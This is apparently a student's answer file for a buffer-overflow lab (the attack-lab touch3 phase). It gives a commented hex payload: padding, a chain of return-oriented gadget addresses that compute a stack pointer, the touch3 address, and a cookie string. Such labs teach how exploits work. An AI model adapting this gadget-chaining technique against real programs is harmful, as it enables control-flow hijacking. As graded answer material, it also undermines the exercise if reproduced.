c3 c3 c3 c3 c3 c3 c3 c3    /* useless space */
c3 c3 c3 c3 c3 c3 c3 c3    /* useless space */
c3 c3 c3 c3 c3 c3 c3 c3    /* useless space */
c3 c3 c3 c3 c3 c3 c3 c3    /* useless space */
c3 c3 c3 c3 c3 c3 c3 c3    /* useless space */
06 1a 40 00 00 00 00 00    /* movq %rsp, %rax */
a2 19 40 00 00 00 00 00    /* movq %rax, %rdi */
cc 19 40 00 00 00 00 00    /* popq %rax */
48 00 00 00 00 00 00 00    /* value 0x48 */
dd 19 40 00 00 00 00 00    /* movl %eax, %edx */
69 1a 40 00 00 00 00 00    /* movl %edx, %ecx */
13 1a 40 00 00 00 00 00    /* movl %ecx, %esi */
d6 19 40 00 00 00 00 00    /* lea  (%rdi, %rsi, 1), %rax */
a2 19 40 00 00 00 00 00    /* movq %rax, %rdi */
fa 18 40 00 00 00 00 00    /* address of touch3 */
35 39 62 39 39 37 66 61 00 /* actual string */